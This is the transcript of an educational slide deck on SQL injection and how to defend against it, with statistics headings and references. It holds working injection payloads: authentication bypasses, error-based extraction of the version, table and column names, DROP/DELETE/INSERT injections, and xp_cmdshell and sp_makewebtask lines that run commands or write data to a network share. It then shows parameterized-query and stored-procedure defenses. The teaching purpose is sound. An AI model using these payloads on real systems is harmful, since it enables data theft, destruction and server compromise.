sql injection what is this g and how to denfend
DESCRIPTION
Sql injection what is this g and how to denfendTRANSCRIPT
SQL Injection
Presenter : Pham Nhat Anh
What is This ?And How to Denfend ?
AGENDA
• Introduction
• SQL Injection statistics over 6 years
• Risks Posed By SQL Injection
• How to prevent SQL Injection correctly
• Question & Answers
INTRODUCTION
• SQL is now is one of the most common attacks in the internet. Simply go to Yahoo! or Google and search for "SQL injection" and we can find tones of related documents.
• Although the awareness of SQL injection is rising, still many people do not have very concrete ideas on how to prevent SQL injection attack.
• This presentation is going to tell you Not Only some information about SQL injection but also more important things, How to prevent SQL injection correctly.
What is SQL injection ?
• The process of adding SQL Statements in user input
• Used by hackers to– Probing databases– Bypass authorization– Execute multiple SQL Statements– Call build-in stored procedures
What is SQL injection …?
• SQL statements “injected” into an existing SQL command
• Used Injection occurs through malformed application input:– Text Box– Query String– Manipulated values in HTML
SQL injection Example
• If the username and password are read directly from a web form or windows form textbox, the user could enter any of the following:
– Username: ‘; drop table users– Password:
– Finaly query:select * from users where username = ‘‘; drop table users -- ‘ and password = ‘‘;
sql = "select * from users where username = ‘" + username + "‘ and password = ‘" + password + "‘";
SQL Injection statistics
SQL Injection statistics
SQL Injection statistics
SQL Injection statistics
SQL Injection statistics
SQL Injection statistics
Risks Posed by SQL injection.
• Confidentiality– SELECT
• Data Integrity– INSERT– DROP– DELETE
• Authentication bypass– ‘OR 1 = 1--
• System compromise– Stored Procedures– Extended Stored Procedures
CONFIDENTIALITY• Get some important information with select statements
– Get Server Version http://localhost/demo.aspx?id=1' OR 1=CONVERT(int,(SELECT @@version))--
– Get Database Namehttp://localhost/demo.aspx?id=1’ OR 1 = CONVERT(int,(db_name())) --
– Get Tables listhttp://localhost/demo.aspx?id =1 ‘ OR 1= CONVERT(int,(SELECT name from sysobject Where xtype=‘U’))--
– Get Columns List' OR 1=CONVERT(int,(SELECT TOP 1 [name] FROM syscolumns WHERE [ID] =(SELECT [ID] FROM sysobjects WHERE [name]='rfPayment_Methods')))--
Data Integrity
• Insert‘; INSERT INTO Table1(col1,col2) VALUES (‘Admin2’,’123456’) --
• Delete‘ ; DELETE FROM Table1 WHERE col1 =‘Admin’ --
• Drop‘ ; DROP TABLE Table1 --
AUTHENTICATION BYPASS
• Login
– Username = ‘ OR ‘’=‘Password = ‘ OR ‘’=‘
– Username = ‘ OR 1=1 --
– Username = ‘ OR ‘a’=‘a’ --
System Compromise
• Extended Stored Procedures
– ‘ ; EXEC master.dbo.xp_cmdshell ‘Net user >c:\inetpub\wwwroot\users.txt’ --
– ‘; EXEC sp_makewebtask '\\10.1.1.2\public\output.html', 'SELECT * FROM ADMIN‘ --
How to prevent SQL Injection correctly
• Input Validationand Remove some meta chars(‘ “ ; \\ …)
• parameterize DML
• stored procedures
• Remove unusual system stored procedures
PARAMETERIZE DML
If DML is a requirement of the application add parameters to the SQL statements
string sql = "SELECT * FROM Users " +"WHERE username=@Username " +"AND password= @Password";
SqlCommand command = new SqlCommand (sql, connection);command.Parameters.Add("@Username", SqlDbType.VarChar).Value = UserName.Text;command.Parameters.Add("@Password",
SqlDbType.VarChar).Value = Password.Text;
STORED PROCEDURES
• Less vulnerable to SQL injection attacks• Added security via EXECUTE permission
SqlCommand command = new SqlCommand ("Users_GetUser", connection);
command.CommandType = CommandType.StoredProcedure;
SqlCommand command = new SqlCommand (sql, connection);command.Parameters.Add("@Username",
SqlDbType.VarChar).Value = UserName.Text;command.Parameters.Add("@Password",
SqlDbType.VarChar).Value = Password.Text;
Conclusion
• SQL Injection is one of the most important problem in web application security
• As shown in page 7, the number of vulnerabilities reported increased more than triples from 2001 Jan-Jun to the same period in 2006, and it is expected that this figure will continue to increase in the near future.
• The solutions for SQL injection are not very complicate but it requires good management to deploy properly
• Don’t under estimate SQL injection and tackle the problem in a more holistic and systematic approach
Reference1. SecuriTeam, SQL Injection Walkthrough, May 2002
http://www.securiteam.com/securityreviews/5DP0N1P76E.html2. Steve Friedl, SQL Injection Attacks by Example, Dec 2004
http://www.unixwiz.net/techtips/sql-injection.html3. Gunter Ollmann, “Second-order Code Injection Attacks”
http://www.nextgenss.com/papers/SecondOrderCodeInjection.pdf4. PHP Magic Quotes Manual
http://www.php.net/manual/en/security.magicquotes.php5. Oracle Invoker's Rights Procedures
http://www.stanford.edu/dept/itss/docs/oracle/10g/network.101/b10773/glossary.htm
6. Security Context of Dynamic SQL Statements Inside a Stored Procedure, http://support.microsoft.com/default.aspx?scid=kb;en-us;301299
7. Jeff Forristal, Source-Code Assessment Tools Kill Bugs Dead, Secure Enterprise, Dec 2005http://www.secureenterprisemag.com/showArticle.jhtml?articleId=174402221
8. Sam M.S NG, SQLBlock: SQL Injection Protection by Variable Normalization of SQL Statement, May 2005http://www.sqlblock.com/sqlblock.pdf